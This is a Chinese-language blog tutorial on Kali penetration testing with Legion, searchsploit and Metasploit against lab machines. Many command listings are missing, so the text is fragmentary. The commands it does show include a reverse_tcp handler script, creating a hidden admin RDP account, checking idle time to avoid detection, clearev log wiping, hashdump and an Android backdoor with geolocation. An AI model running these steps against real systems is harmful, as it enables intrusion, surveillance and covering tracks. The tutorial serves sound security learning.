Legion是Sparta的一個分支,它是一個開源的、易於使用的、超級可延伸的、半自動的網路滲透測試框架。它是一款Kali Linux系統預設整合的Python GUI應用程式工具。Legion是一個Nmap、Nikto、Hydra等工具的集合,利用各個工具的優秀功能,完成收集資訊、掃描和爆破等任務。
Legion主要包含以下功能:埠掃描,程式自動呼叫Nmap進行掃描,根據Nmap的掃描結果,nikto自動載入結果,展開更精確的掃描。針對掃描結果,使用特定的工具,比如dirbuster目錄爆破,利用webslayer進行web指紋識別。針對可暴力破解的埠,呼叫hydra進行暴力破解。下面我們來看下如何使用這款工具:
首先我們先登入Metasploitable2,通過ifconfig命令獲取其IP地址。然後
開啟Legion工具。然後輸入sudo legion啟動工具。
點選加號。
在這裡輸入你要滲透的ip即可,然後點選submit按鈕即可。
首先,大家先記下一個地址:https://www.exploit-db.com/。它是專門用來收集各種漏洞的網站。在kali系統中,有搜尋漏洞資料庫的本地副本,我們可以在終端視窗中輸入命令去搜尋。
命令就是searchsploit,它的常用選項如下:
下面我們看下例子:
實踐:
Metasploit被業內譽為可以黑掉整個宇宙的工具,雖然有些誇張,但是足以見得Metasploit有多強大。Metasploit是目前最流行、 最強大、最具拓展性的滲透測試平臺。2003年由HD摩爾釋出第一版,2007年用ruby語言重寫。後來被Rapid7收購後,分出了多個版本,有付費的,也有免費的。 Metasploit的官網是:https://www.metasploit.com/。
我們可以在Kali系統中找到該軟體:
點選之後輸入系統root密碼,等待一會後,就變成這樣了:
實驗靶機:metasploitable2。
實驗靶機:win7。
SMB,全稱是Server Message Block,即服務資訊塊,是一個協定名。它能被用於Web連結和使用者端與伺服器之間的資訊溝通。通過掃描SMB,可以識別目標的系統資訊。
實驗靶機:linux。
掃描伺服器的SSH服務。
獲取FTP密碼。
我們需要一個模擬使用者:win7。需要一個實驗靶機:Windows server 2008(帶有FTP服務)。
SNMP是專門設計用於在IP網路管理網路節點(伺服器、工作站、路由器、交換機等)的一種標準協定,它是一種應用層協定。各種網路裝置上都可以看到預設啟用的SNMP服務,從交換機到路由器,從防火牆到網路印表機,無一例外。
本次的實驗靶機:Metasploitable2。
預設情況下,Metasploitable2的SNMP服務僅監聽本地主機。所以我們需要對靶機的預設設定做一下修改。
實驗靶機:多臺windows。
使用的模組:auxiliary/scanner/smb/smb_login。
知道ip地址範圍即可,批次掃描。
VNC(Virtual Network Console)是虛擬網路控制檯的縮寫。它是一款優秀的遠端控制工具軟體。VNC是在基於UNIX和Linux作業系統的免費的開源軟體,遠端控制能力強大,高效實用,其效能可以和windows和Mac中的任何遠端控制軟體媲美。在Linux中,VNC包括以下四個命令:
大多數情況,只需要1、2兩個命令即可。
實驗靶機:Metaspolitable2。
然後我們試下vnc密碼爆破
然後我們有了密碼,試下vnc登入。
Wmap本身不是一個獨立的漏洞掃描器,而是作為Metasploit的一個模組。結合Web漏洞和Web服務相關的模組協同工作,完成目標伺服器的掃描任務。它的掃描結果不會自動生成報告,而是直接存入Metasploit的資料庫。
實戰:
實驗靶機:Window Server 2008/Windows 7。
實驗靶機:Windows XP。漏洞利用:ms12-004。
實驗靶機:windows xp。
前提必須要有一個session對談。
其他模組:
首先,windows、Linux、java、php、Android等後門都支援。嘿嘿。
命令:
Msfvenom:
實踐:
實驗靶機:Android模擬器。
總體的流程跟windows後門是很類似的,只是使用的模組有些許的區別。我們需要修改一些設定:
實驗開始:
然後你就可以幹你想幹的事了。
我們先來學下檔案系統命令:
實踐從手機下載檔案,上傳檔案,大家可以自己嘗試哦:
具體的Android命令有很多,這裡就不多說了,大家有興趣可以自己去百度查下。然後實現定位就很簡單了,使用geolocate命令即可。
有的時候,你可能會發現自己的Meterpreter對談受到了使用者許可權的限制。修改登入檔、安裝後門或匯出密碼等活動都需要提升用許可權。而Meterpreter給我們提供了一個getsystem命令,可以實現提權。
另外,getuid可以獲取當前的使用者資訊,system是系統的最高許可權。如果使用system命令仍無法獲取,那麼接下來可以使用之前學過的漏洞提權。
我們來看下漏洞提權的實踐步驟:
提升許可權後,可以通過hashdump模組,從SAM資料庫中匯出本地賬號。資料的輸出格式是:
使用者名稱:SID:LM雜湊:NTLM雜湊:::
快速執行命令指令碼:每次我們執行的命令內容基本上都是類似的,所以我們可以建立一個檔案。
1.然後右鍵選擇用mousepad開啟。
2.然後可以把我們常用的命令寫到這個指令碼裡。內容如下:
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.10.129 set lport 5555
3.然後儲存檔案。
4.開啟Metasploit。輸入這樣的命令:resource /home/(你的使用者名稱)/windows_control。
5.指令碼就執行了。
6.然後直接run。
7.再開啟被控端就可以了。
execute命令可以可以在目標系統中執行應用程式。該命令的使用方法如下:
然後哈哈哈哈哈,我們可以試一下這個命令:execute -f calc.exe。開啟Windows的計算器。哦吼,好玩吧。
screenshot命令來進行截圖,並儲存在kali中。
screenshare命令可以進行實時的監控。
通過getgui指令碼,使用-u和-p引數,並給它分配管理員許可權,然後將其新增到遠端桌面使用者組中。
run getgui -u hack -p pass123
注意:如果你的許可權不是SYSTEM,需要用之前學過的方法進行提權。提權之後再用上面的命令建立使用者。
如果使用者沒有開啟遠端桌面功能,那麼可以通過:
run getgui -e
來開啟遠端桌面。
在開啟遠端桌面之前,我們還需要使用idletime命令檢查遠端使用者的空閒時常,這樣可以降低你被發現的概率。
然後我們在新的終端執行:rdesktop [你的目標ip:3389]。
然後可能你建立的使用者許可權不夠。那麼你可以在Meterpreter中執行shell命令,也就是開啟你控制的目標主機的終端,執行下面的命令:
net localgroup administrators hack/add。這裡的hack就是你之前建立的使用者名稱。
Meterpreter可以通過與其他程序繫結來實現持久化。
可以通過clearev命令來清除紀錄檔。
ps:我們可以通過右鍵計算機-》管理-》事件檢視器-》Windows紀錄檔。來檢視紀錄檔。
本文來自部落格園,作者:Zaking,轉載請註明原文連結:https://www.cnblogs.com/zaking/p/17864907.html